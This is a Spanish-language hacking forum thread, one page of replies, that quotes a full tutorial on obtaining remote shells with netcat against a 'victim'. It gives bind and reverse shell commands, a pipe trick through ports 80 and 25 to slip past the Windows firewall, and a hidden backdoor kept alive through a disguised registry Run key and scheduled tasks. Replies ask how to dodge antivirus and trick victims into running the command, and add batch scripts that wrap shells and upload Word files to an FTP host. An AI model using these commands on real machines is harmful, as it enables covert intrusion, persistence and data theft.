elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
07 Septiembre 2008, 11:45  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, zhyzura)
| | |-+  Paper: Obtener shell con Netcat
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 Ir Abajo Imprimir
Autor Tema: Paper: Obtener shell con Netcat  (Leído 56657 veces)
PapuXeneize

Desconectado Desconectado

Ver Perfil
Re: Paper: Obtener shell con Netcat
« Respuesta #195 en: 07 Mayo 2007, 05:21 »

Miren lo q me sale
Alguien sabe xq?
donottrustno01

Libera tu mente

Ver Perfil
« Respuesta #196 en: 16 Julio 2007, 05:41 »

Muy weno lo probe y me anda de pelos con mis dos pc's.

Graxias por las imágenes quedan de 10

A seguir probando :P

Libera tu mente.

Matrix nos rodea. Está por todas partes. Incluso ahora, en esta misma habitación. Puedes verla si miras por la ventana o al encender la televisión. Puedes sentirla cuando vas a trabajar, cuando vas a la iglesia, cuando pagas tus impuestos. Es el mundo que ha sido puesto ante tus ojos para ocultarte la verdad.
magarcan

Ver Perfil
« Respuesta #197 en: 27 Noviembre 2007, 11:10 »

Tengo una pregunta y una duda a ver si me podéis ayudar.
1º La pregunta, ¿por qué tienes que encriptar el nc.exe del netcat, es que los antivirus lo detectan?
2º Tengo un archivo propio compilado que hace esto mismo. pero tengo un problema, si pongo a escuchar el netcat en mi PC (en los puertos 80 y 25) y la victima se conecta a mi ordenador todo perfecto, ¿pero qué pasa cuando hay varias victimas y se conectan a los mismo puertos?
ariaspa

Ver Perfil
« Respuesta #198 en: 17 Enero 2008, 18:50 »

YA ESTA DISPONIBLE EN PDF

Para todos aquellos que lo quieran descargar aqui estan dos url de descarga:

http://mx.geocities.com/zhyzura/Shell.con.Netcat.by.zhyzura.pdf

mirror brujo's (esta descarga es mas rapida y sin limite de conexion)

http://personal.telefonica.terra.es/web/alexb/manus/Shell.con.Netcat.by.zhyzura.zip

-[ OBTENER SHELL CON NETCAT ]-

Pues bien, como todos sabemos una de las tantas utilidades que tiene esta maravillosa herramienta es la de poder

devolvernos una shell de un equipo sin ninguna dificultad, inclusive aun estando detras de una red y por que no...

hasta del firewall de windows xp Sp2 :D.
muchos de los exploits que circulan por la red estan basados en el funcionamiento de netcat, asi de que aprender a

manejarlo es lo primero que se debe de saber.
Espero explicarme de una manera clara y sencilla de manera que a cualquiera que lea esto le quede claro como obtener una shell con netcat.

Ahora si dejemonos de tanta platica y comencemos con la practica :P...

Para mi ejemplo voy a utilizar dos equipos:
Equipo atacante [192.168.1.2]: Windows xp sp1.

Equipo victima [192.168.1.4]: Windows xp Sp2.

[SHELL DIRECTA CON LA VICTIMA]

Nota: si utilizas un puerto el cual este protegido por el firewall de windows tendras que habilitarlo previamente

para poderlo poner a la escucha.

Esto no es nada dificil de lograr lo unico que necesitamos de hacer es dejar un netcat a la escucha en la victima de

la siguiente manera  (solo decir que en win9x seria "command.com" y en un NT seria "cmd.exe"):

Código:
nc -l -d -e cmd.exe -p 6000

donde los flags significan lo siguiente:
-d  (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.

-e <prog>  (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.

-l  (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión

-p <puerto> (Puerto para pegarse)
Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.

-v   (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario.

-L Es mas recomendable usar esta opcion que la opcion "-l" ya que al cerrar una conexion podemos volver a iniciarla sin necesidad de que el equipo victima vuelva a reiniciar su pc. (en mis ejemplos voy a usar -l pero sugiero poner -L)

Lo ideal es que tengas el nc.exe dentro de la carpeta system32 en caso contrario tendras que especificar la

direccion en la que se encuentra:

Código:
C:\mi carpeta\nc -l -d -e cmd.exe -p 6000

una vez hecho esto solo falta que nosotros nos conectemos a la victima en el puerto especificado (en este caso es el

6000), y asi nos devolvera la shell:

Código:
nc -vv 192.168.1.4 6000

Recuerden que para que este tipo de conexion funcione, la victima tiene que tener una "ip publica", esto es que sea

visible por cualquier equipo con el simple hecho de que este conectedo a internet.

[REVERSE SHELL CON NETCAT]

Este tipo de conexion es ideal para equipos que se encuentran dentro de una red, lo unico que necesitamos es que el

equipo atacante tenga una "ip publica", de esta manera sera la victima quien se conecte a nosotros y no nosotros con

el.

Para ello primero tenemos que dejar un netcat a la escucha en el equipo atacante de la siguiente manera:

Código:
nc -vv -l -p 6000

ahora que el atacante esta preparado solo tenemos que hacer que la victima "sirva" la shell al puerto que tiene en

escucha el equipo atacante, de la siguiente manera:

Código:
nc -d -e cmd.exe 192.168.1.2 6000

[VOLTEAR LA SHELL CON NETCAT]

Como habran observado en los dos ejemplos anteriores para poder hacer una conexion exitosa con la victima, un

requisito indispensable es que el puerto que estemos utilizando lo tengamos habilitado por el firewall, asi de que

si la victima tiene el firewall activado a la hora de que realicemos dicho proceso le va a saltar la pantalla de

alerta del firewall que tiene incluido el Sp2 y eso nos va a delatar al momento :(.

por lo tanto lo mejor que podemos hacer para que esto no ocurra seria utilizar puertos que no esten filtrados por un

firewall o por un router con firewall integrado, para ello vamos a utilizar dos puertos uno para enviar la

informacion y otro para resivirla, y como todos sabran, la mayoria de los firewall tienen habilitados los puertos

80(http) y 25(smtp), inclusive el firewall del Sp2 los tiene habilitados por default (por eso adoro a microsoft

xDDD).

Suena algo raro y ademas dificil pero ya veran que es muy facil de hacer (este tipo de conexion funciona tambien con

equipos en los cuales la victima se encuentra dentro de una red).

En primer lugar vamos a necesitar poner dos netcat a la escucha en el equipo atacante (cada uno en su propia ventana

o indicador de comando, como gusten llamarle).

en uno ponemos el puerto 80:
Código:
nc -vv -l -p 80

y en el otro ponemos el puerto 25:
Código:
nc -vv -l -p 25

Ya que tenemos todo listo, basta con que el equipo victima ejecute el siguiente comando (recordar que en mi ejemplo

el atacante tiene ip 192.168.1.2 o tambien puede ser uno que posea una ip publica a fin de cuentas es una conexion

inversa :D):

Código:
nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25

y walaa!!!!! ya tenemos la shell de nuestra victima y el firewall del sp2 no dira ni pio, ya que por defecto admite

la entrada de informacion por el puerto 80 y la salida por el 25.

Ahora bien ¿como vamos a mandar los comandos a la shell remota y donde vamos a ver los resultados?
como dije anteriormente nosotros le vamos a enviar los comandos desde la ventana en la cual teniamos el netcat a la

escucha en el puerto 80 y automaticamente la victima nos va a devolver los resultados en la ventana que tiene el

netcat a la escucha en el puerto 25.

[DEJARLO COMO PUERTA TRASERA]

Una manera muy usada seria dejar una llave en el registro que nos ejecute el netcat cada que se prenda el pc

victima, para ello tenemos que hacer lo siguiente:

damos un click en inicio > ejecutar > regedit
una vez abierto el registro de windows nos ubicamos en la siguiente rama:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

damos click derecho > nuevo > valor alfanumerico.
le pònemos un nombre que no levante sospechas como rundll32, svchost, etc. ( no le vallan a poner servernetcat,

virus, etc por que los van a cachar rapidamente)
Despues le damos click derecho al valor que creamos > modificar. Y agregamos la ruta del netcat con sus respectivos

parametros:

si quieren que se quede en un puerto a la escucha:
Código:
nc -l -d -e cmd.exe -p <puerto>

si quieren que conecte con una ip:
Código:
nc -d -e cmd.exe ip.ip.ip.ip <puerto>

si quieren voltear la shell para que no la detcte un firewall seria (recuerden que es con la ip del atacante):
Código:
nc ip.ip.ip.ip <puerto> | cmd.exe | nc ip.ip.ip.ip <puerto>
solo agregar que si lo ponemos de esta manera, a la hora de que inicie el pc va a aparecer la ventana de ms-dos y si la cierra la victima perderemos la shell...
por lo tanto no olvidemos que podemos agregar la opcion -d para que permanesca oculta.
haciendo lo dicho anteriormente quedaria el comando de la siguiente manera:
Código:
nc -d ip.ip.ip.ip <puerto> | cmd.exe | nc -d ip.ip.ip.ip <puerto>

Para agregar una nueva llave al registro desde una shell remota lo que tenemos que teclear seria lo siguiente:
Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -l -d

-e cmd.exe -p 6000"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)

una desventaja de agregar este tipo de entradas es que en las conexiones inversas el atacante primero tendria que

dejar un netcat a la escucha si no no funcionaria por lo tanto lo que podemos hacer aqui es dejarlo programado para

que se ejecute diariamente a determinada hora que nosotros ya tengamos previamente nuestro netcat a la espera de la

shell, para esto vamos a utilizar el comando AT, la sintaxis seria la siguiente:

Código:
at <hora> <dia> "comando"

por lo tanto quedaria asi:

Código:
at 6:00p /every:1 ""nc -d -e cmd.exe 192.168.1.2 6000""

o tambien:

Código:
at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

de esta manera ejecutara el netcat todos los dias 1 de cada mes del año a las 6:00 p.m. asi de que si quieren que se ejecute todos los dias hagan lo mismo agregando los numeros 1,2,3...30, no los intenten poner todos de un solo jalon por que no les va a funcionar, lo van a tener que hacer de uno por uno:
Código:
at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

Código:
at 6:00p /every:2 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

Código:
at 6:00p /every:3 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

Asi seria tomando en cuenta de que el nc ya se encuentre en system32, en caso contrario van a tener que poner la ruta del netcat. ejemplo:

Código:
at 6:00p /every:1 ""c:\directorionetcat\nc -d 192.168.1.2 80 | cmd.exe | c:\directorionetcat\nc -d 192.168.1.2 25""

para verificar que se haya agregado la tarea solo tecleen:
Código:
at

si quieren ver todas las opciones del comando at solo teclen:

Código:
at -h

Espero les haya gustado mi explicacion, cualquier duda o aclaracion sobre el presente texto favor de preguntar o

decirmelo lo antes posible :P

Referencia:
Sacandole Provecho a una exelente Utilidad by kliber

zaludox y Gracias a Gospel por animarme a hacer este texto :P  (siempre terminas convenciendome de hacer este tipo de cosas xDD)
Shadow of the Day

Kaoru x)

Ver Perfil WWW
« Respuesta #199 en: 18 Enero 2008, 03:18 »

PapuXeneize tal vez no funciona por que la victima no tiene una ip publica, oe porque no especificaste el numero de puerto.

... ¿Tienes dudas?
¿Verguenza de expresarlas?...
¿Recien empiezas?....

Entonces esta es tu web de incio
V-Getah

Ver Perfil
« Respuesta #200 en: 05 Febrero 2008, 23:36 »

JAJA Muchas gracias por tu aporte man!!  :D
Esta de lujo! 5 *****!!  ;D

Salu2 desde V-GeTaH!!  >:D
KEBON

Ver Perfil
« Respuesta #201 en: 06 Febrero 2008, 17:25 »

Hola a todos, ante todo felicitar a zhYzura por el manual del NetCat. Estoy haciendo mis primeros pasos en esto, he leido bastente del foro pero me encuentro con un problema que al menos no he encontrado solucion en lo que he leido. Pero se que algo debe haber para solucionarlo. Ya tengo el control de una Pc tras un router, uso el Remote Administrator, esta ya como servicio en run y no se ve el icono, ahora quiero probar con el NetCat (que nunca he usado, por eso me viene excelente el manual) pero al querer usarlo en mi pc el AVG lo detecta, (Troyan Horse BackDoor.RBot.DU) obviamente la pc en la que que estoy tratando de usar el nc tiene tambien antivirus, (el AVG tambien) con lo que cuando yo le copie el nc y lo ejecute, saltará su antivirus. Debo deshabilitar su avg ? o algun programa para encriptarlo y  que luego no lo detecten los antivirus? Se que en Mi pc deberia trabajarlo sin antivirus (ya que he probado con varios pero no me permiten indicarle que dicho arhivo lo ignore "para siempre" y la verdas que es un lio trabajar así...Hay algun antivirus que me recomienden para XP para trabajar en mi pc?)  y como hacer para que no lo detecte como virus la victima?? Desde ya muchas gracias ! ;) NOTA: Disculpen ahora veo que lo de "Re: Paper: Obtener shell con Netcat" esta en Hacking Avanzado (lo encontre con el buscador del foro y me enganche sin ver de donde estaba colgado el mensaje...) y esta no es una pregunta para este nivel, pero bueno solo entre a modificar el mensaje para agregar esto. Disculpen y Gracias !
« Última modificación: 06 Febrero 2008, 17:52 por KEBON » En línea
EDM02

Ver Perfil
« Respuesta #202 en: 17 Febrero 2008, 19:52 »

Hola a todos, soy bastante nuevo en este tema del hacking.. y me surge una duda..
Luego de poner los dos puertos en escucha.. como se supone que tengo que hacer que la pc victima ejecute ese comando?
Es como dicen en la guia de jugando con netcat que tengo que mandar el archivo con los comandos para que se ejecute? Hay alguna manera de hacerlo sin mandar algun archivo?
Desde ya gracias por la respuesta
softdates

Ver Perfil
« Respuesta #203 en: 25 Mayo 2008, 23:23 »

http://www.usuarios.lycos.es/orlyyan/index.html

todo lo que se sobre netcat espero les sirva de algo aunque netcat ya no sirve :laugh:
RockoX

... L30 ...

Ver Perfil
« Respuesta #204 en: 25 Mayo 2008, 23:33 »

Por que dices, que Netcat, no sirve?, claro que sirve.

Si bien netcat es muy detectado ya por los AV´s, pero ay alternativas buenas como Cryptcat, que aun no es detectado por Nod32, y muchos mas (A excepcion de KIS).

Pero claro que sirve!!!

Yo tocando Canon Rock (Guitarra Electrica)...   
http://youtube.com/watch?v=xZx7DEweeKw
zhyzura
Sie sind nicht wie die anderen
Moderador

"dieses ist es unsere Welt"

Ver Perfil
« Respuesta #205 en: 05 Junio 2008, 06:50 »

o prueba a modificar el codifo fuente y le vuelves a compilar...

hay muchas formas de volverlo indetectable nuevamente.

- - -->>  Sie urteilen zu uns seiend unterschiedlich  <<-- - -
unser Durst des
Wissens ist unersättlich
morenochico

Ver Perfil
« Respuesta #206 en: 16 Junio 2008, 05:59 »

¿ Como iniciar y negociar conexiones de netcat desde un archivo?

Gracias a este manual pude obtener facilmente la shell remota, pero ahora lo que quiero es hacer un .bat que me invoque la conexion netcat y que ejecute ciertos procesos o instrucciones que esten en el bat.

Es mas cambie
Código:
nc -l -d -e cmd.exe -p 6000
por
Código:
nc -l -d -e MenuBienvenida.bat -p 6000
  y funciono pero  pongo el
Código:
nc -vv 192.168.1.4 6000
dentro de ConectateAlServidor.bat y no funciona. ¿como le hago para pasarle los parametros e instrucciones desde un archivo?  Pues lo que quiero es que una persona al dar clic al conectate.bat salga un menu y segun elija se conecta a un servidor diferente o hace instrucciones diferentes en el mismo servidor, ya que lo que quiero es que la persona no sepa que esta en una shell remota.  Lo que quiero decir es que la persona no va a teclear  instrucciones ni saber a donde esta accesando, para la persona solo va a hacer un menu y listo solo elige las opciones y ya.
RockoX

... L30 ...

Ver Perfil
« Respuesta #207 en: 16 Junio 2008, 19:31 »

Puedes utilizar Script`s batch, para lo que quieres.

Pero no entiendo muy bien lo que pides

Lo que quiero decir es que la persona no va a teclear  instrucciones ni saber a donde esta accesando, para la persona solo va a hacer un menu y listo solo elige las opciones y ya.

Bueno, la verdad no entiendo, pero puedes hacer un batch, que pregunte ciertos valores al usuario y se haga automatico, algo sencillito asi :
Código:
@echo off
color 0a
Title Netcat!

:Menu
cls
echo 1.-Shell inversa
echo 2.-Shell directa
echo.
set /p opc=Teclee el numero de las opciones dadas :
if ["%opc%"]==[""] (
cls
echo No has puesto nada!
pause>nul
goto:Menu
)
if %opc% LSS 1 (
)
if %opc% GTR 2 (
)
if %opc%==1 (
goto:Inversa
)
if %opc%==2 (
goto:Directa
)

:Inversa
cls
set /p Puerto=Elija el puerto, a poner en escucha :
if ["%Puerto%"]==[""] (
cls
echo No has puesto nada!
pause>nul
goto:Inversa
)
cls
nc -vlp %Puerto%
cls
msg *  Conexion Perdida
pause>nul
goto:EOF

:Directa
cls
set /p Host=Escriba el host a conectar :
if ["%Host%"]==[""] (
goto:Directa
)

:Puerto
cls
set /p Puerto2=Ingrese el puerto :
if ["%puerto2%"]==[""] (
goto:Puerto
)
nc -d -e cmd.exe %Host% %Puerto2%
msg * Conexion perdida.

Yo tocando Canon Rock (Guitarra Electrica)...   
http://youtube.com/watch?v=xZx7DEweeKw
pokepaxa

Ver Perfil
« Respuesta #208 en: 16 Junio 2008, 21:31 »

Parece que Crypcat no trae -e ))
morenochico

Ver Perfil
« Respuesta #209 en: 18 Junio 2008, 02:16 »

Bueno, es que cuando pongo 
nc -d -e cmd.exe %Host% %Puerto2%
msg * Conexion perdida.

en un archivo.bat  el cliente no se conecta al servidor que esta a la escucha. Lo quiero saber si se puede es hacer poner las instrucciones en uno o varios .bat donde ya vengan las instrucciones de conectarse y cuando lo hagan manden x  comandos al servidor. Ejemplos

mata_messenger.bat
@echo off
rem voy a quitar el messenger a mi "victima"
nc -d -e cmd.exe ip.ip.ip.101 puerto
TSKILL messenger.exe
:EOF

CancelaImpresiones.bat
Código:
rem voy bajar el servicio de impresiones
nc -d -e cmd.exe ip.ip.ip.102 puerto
net stop "Print Spooler"

Menu.bat
Código:
@echo off
echo  ******************** MENU PRICIPAL **********************************
echo  *                                                                                   
echo  * [1] Quitar messenger a morenochico (que trabaje)                 
echo  * [2] Impedir que se use la impresora (queremos ahorrar papel)
echo  * [9] salir                                                                               
echo  *                                                                                                   
echo  **********************************************************************
echo     OPCION:
set /p opcion=
if %opcion% ==1 mata_messenger.bat
if %opcion% ==2 CancelaImpresiones.bat

Entonces estos tres .bat estaran en el cliente y quien de clic en menu.bat no va a saber que esta obteniendo una shell remota ni que esta usando netcat.

como ejemplo se puede hacer una conexion ftp que ejecute instrucciones que estan en un archivo ejemplo:
ftp.txt
Código:
open ip.ip.ip.103
user anonymous anonymous
cd Directorio
prompt
put *.DOC
quit

ftp.txt a su vez es usado en:
sube.bat
Código:
@echo off
echo voy a subir todos los documentos de word
ftp -v -n -s:ftp.txt
:eof

Entonces quiero hacer lo mismo pero para netcat
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.